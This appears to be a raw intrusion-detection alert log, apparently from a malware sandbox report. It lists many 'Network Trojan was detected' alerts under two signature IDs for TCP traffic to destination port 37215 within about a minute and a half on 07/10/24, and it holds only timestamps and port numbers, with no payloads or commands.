                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.224405
                  SID:2835222
                  Source Port:53714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.421104
                  SID:2829579
                  Source Port:46112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.802589
                  SID:2835222
                  Source Port:47038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.009687
                  SID:2835222
                  Source Port:48978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.093940
                  SID:2835222
                  Source Port:50714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.096875
                  SID:2835222
                  Source Port:57336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404387
                  SID:2829579
                  Source Port:44936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.891587
                  SID:2835222
                  Source Port:55766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809992
                  SID:2829579
                  Source Port:58366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.603395
                  SID:2835222
                  Source Port:51816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385824
                  SID:2829579
                  Source Port:50226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.426125
                  SID:2829579
                  Source Port:45874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260584
                  SID:2829579
                  Source Port:53214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.445959
                  SID:2829579
                  Source Port:49160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.005447
                  SID:2835222
                  Source Port:41324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.788694
                  SID:2829579
                  Source Port:51756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.968109
                  SID:2835222
                  Source Port:33798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.932722
                  SID:2829579
                  Source Port:57178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.105929
                  SID:2829579
                  Source Port:56454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.948023
                  SID:2829579
                  Source Port:35812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.882807
                  SID:2835222
                  Source Port:45408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.486969
                  SID:2835222
                  Source Port:48540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.834790
                  SID:2829579
                  Source Port:41068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.190892
                  SID:2829579
                  Source Port:39262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.778513
                  SID:2835222
                  Source Port:52048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.510800
                  SID:2835222
                  Source Port:48128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.177669
                  SID:2829579
                  Source Port:33894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867755
                  SID:2835222
                  Source Port:55226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.026941
                  SID:2829579
                  Source Port:53868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.558808
                  SID:2829579
                  Source Port:60126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.858837
                  SID:2835222
                  Source Port:59452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.834803
                  SID:2835222
                  Source Port:43206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.322019
                  SID:2829579
                  Source Port:44292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.839511
                  SID:2829579
                  Source Port:37440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.090184
                  SID:2829579
                  Source Port:54112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.552864
                  SID:2835222
                  Source Port:44462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.136033
                  SID:2835222
                  Source Port:38902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.833735
                  SID:2829579
                  Source Port:50970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.743093
                  SID:2835222
                  Source Port:60018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744457
                  SID:2835222
                  Source Port:34820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.829159
                  SID:2829579
                  Source Port:44828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.515884
                  SID:2829579
                  Source Port:56760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.605260
                  SID:2829579
                  Source Port:49494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.285291
                  SID:2835222
                  Source Port:58558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.428149
                  SID:2829579
                  Source Port:35250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.355050
                  SID:2829579
                  Source Port:45670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.804457
                  SID:2829579
                  Source Port:54734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389277
                  SID:2835222
                  Source Port:39440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.493040
                  SID:2829579
                  Source Port:44708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.595518
                  SID:2835222
                  Source Port:58570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.994983
                  SID:2829579
                  Source Port:39742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.805263
                  SID:2829579
                  Source Port:33936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.832031
                  SID:2829579
                  Source Port:49332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.285342
                  SID:2829579
                  Source Port:57714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.583179
                  SID:2829579
                  Source Port:46832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.860339
                  SID:2829579
                  Source Port:37688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.450932
                  SID:2835222
                  Source Port:36296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.877145
                  SID:2835222
                  Source Port:41884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.824245
                  SID:2835222
                  Source Port:40914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.171262
                  SID:2829579
                  Source Port:51018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.577578
                  SID:2829579
                  Source Port:54254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.023692
                  SID:2829579
                  Source Port:34404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867804
                  SID:2829579
                  Source Port:52036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.610357
                  SID:2835222
                  Source Port:42288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621432
                  SID:2829579
                  Source Port:57332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.451906
                  SID:2829579
                  Source Port:53810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2835222
                  Source Port:39072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.789952
                  SID:2835222
                  Source Port:42406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.605859
                  SID:2835222
                  Source Port:57914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.661383
                  SID:2829579
                  Source Port:56276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231407
                  SID:2835222
                  Source Port:49858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.795320
                  SID:2829579
                  Source Port:45428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.928888
                  SID:2835222
                  Source Port:50694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.090396
                  SID:2835222
                  Source Port:38164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.344618
                  SID:2835222
                  Source Port:57274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.834790
                  SID:2829579
                  Source Port:55668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885160
                  SID:2829579
                  Source Port:34728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.076000
                  SID:2835222
                  Source Port:32770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.610911
                  SID:2835222
                  Source Port:51532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.986836
                  SID:2835222
                  Source Port:60968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.847000
                  SID:2835222
                  Source Port:40646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.557067
                  SID:2835222
                  Source Port:34976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.476844
                  SID:2835222
                  Source Port:59788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.628509
                  SID:2835222
                  Source Port:42546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.762388
                  SID:2835222
                  Source Port:55582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2835222
                  Source Port:34740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.352654
                  SID:2829579
                  Source Port:54944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.016890
                  SID:2829579
                  Source Port:49428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981356
                  SID:2835222
                  Source Port:46100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.586951
                  SID:2835222
                  Source Port:41974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.013451
                  SID:2829579
                  Source Port:35344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761850
                  SID:2829579
                  Source Port:54328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.680927
                  SID:2835222
                  Source Port:54038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.254511
                  SID:2835222
                  Source Port:41576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981356
                  SID:2829579
                  Source Port:39572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.861688
                  SID:2835222
                  Source Port:39572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.764696
                  SID:2835222
                  Source Port:51636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.927617
                  SID:2829579
                  Source Port:37692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.251804
                  SID:2829579
                  Source Port:60118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.112995
                  SID:2829579
                  Source Port:42574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.878190
                  SID:2835222
                  Source Port:47226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483995
                  SID:2829579
                  Source Port:55682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.941527
                  SID:2829579
                  Source Port:53642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.926609
                  SID:2835222
                  Source Port:55862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.861410
                  SID:2829579
                  Source Port:60372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.890895
                  SID:2835222
                  Source Port:58392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.316362
                  SID:2835222
                  Source Port:56780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.453868
                  SID:2835222
                  Source Port:56026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.222774
                  SID:2835222
                  Source Port:53628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.424272
                  SID:2829579
                  Source Port:44664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828226
                  SID:2829579
                  Source Port:47216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.896247
                  SID:2829579
                  Source Port:38268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.542796
                  SID:2835222
                  Source Port:50936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.116732
                  SID:2829579
                  Source Port:38532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.298145
                  SID:2829579
                  Source Port:55032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.365317
                  SID:2829579
                  Source Port:38996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453697
                  SID:2829579
                  Source Port:43644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.691821
                  SID:2829579
                  Source Port:40408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.558089
                  SID:2829579
                  Source Port:48166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.608580
                  SID:2835222
                  Source Port:46718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.994247
                  SID:2829579
                  Source Port:34174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.534689
                  SID:2829579
                  Source Port:45820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.137377
                  SID:2829579
                  Source Port:45942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.462695
                  SID:2835222
                  Source Port:59764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.588104
                  SID:2829579
                  Source Port:42464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.850693
                  SID:2835222
                  Source Port:55640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.501498
                  SID:2829579
                  Source Port:47536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.256885
                  SID:2835222
                  Source Port:44964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.816680
                  SID:2835222
                  Source Port:43152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.755457
                  SID:2835222
                  Source Port:47850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.441274
                  SID:2829579
                  Source Port:34914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.966709
                  SID:2835222
                  Source Port:44734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.670827
                  SID:2829579
                  Source Port:40842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761850
                  SID:2829579
                  Source Port:39510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.853757
                  SID:2835222
                  Source Port:51346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.782685
                  SID:2835222
                  Source Port:59434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.330413
                  SID:2829579
                  Source Port:53946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.804937
                  SID:2835222
                  Source Port:44108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.651021
                  SID:2835222
                  Source Port:38450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.798195
                  SID:2835222
                  Source Port:43718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655203
                  SID:2829579
                  Source Port:35444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.492179
                  SID:2829579
                  Source Port:49094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.144364
                  SID:2829579
                  Source Port:44474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.909297
                  SID:2835222
                  Source Port:58572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.921577
                  SID:2835222
                  Source Port:53344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.772225
                  SID:2835222
                  Source Port:34678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.083830
                  SID:2829579
                  Source Port:57388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.991411
                  SID:2835222
                  Source Port:50510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.463338
                  SID:2829579
                  Source Port:34224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.557842
                  SID:2835222
                  Source Port:33808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:21.455167
                  SID:2835222
                  Source Port:50704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.433410
                  SID:2829579
                  Source Port:42100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.956633
                  SID:2829579
                  Source Port:53646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.254680
                  SID:2829579
                  Source Port:37816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.583179
                  SID:2835222
                  Source Port:36472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.429155
                  SID:2829579
                  Source Port:41806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.104603
                  SID:2829579
                  Source Port:51248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.860870
                  SID:2835222
                  Source Port:39646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.546136
                  SID:2829579
                  Source Port:36880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.609585
                  SID:2829579
                  Source Port:37638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.351909
                  SID:2829579
                  Source Port:39334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.881196
                  SID:2829579
                  Source Port:58874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.996261
                  SID:2829579
                  Source Port:58632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.437986
                  SID:2835222
                  Source Port:60208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.964289
                  SID:2835222
                  Source Port:44032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.283182
                  SID:2829579
                  Source Port:51082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.072857
                  SID:2835222
                  Source Port:35994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629470
                  SID:2829579
                  Source Port:46370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.137377
                  SID:2835222
                  Source Port:39142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.811235
                  SID:2835222
                  Source Port:55044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.364210
                  SID:2829579
                  Source Port:37008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.727335
                  SID:2829579
                  Source Port:35174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.024076
                  SID:2835222
                  Source Port:35460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.728995
                  SID:2829579
                  Source Port:42114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2829579
                  Source Port:43646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.896210
                  SID:2835222
                  Source Port:44728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.411416
                  SID:2835222
                  Source Port:51922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583025
                  SID:2835222
                  Source Port:44380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.800437
                  SID:2835222
                  Source Port:33772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.173734
                  SID:2835222
                  Source Port:58942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.860909
                  SID:2835222
                  Source Port:38028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.070871
                  SID:2835222
                  Source Port:59428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.672163
                  SID:2835222
                  Source Port:56682
                  Destination Port:37215
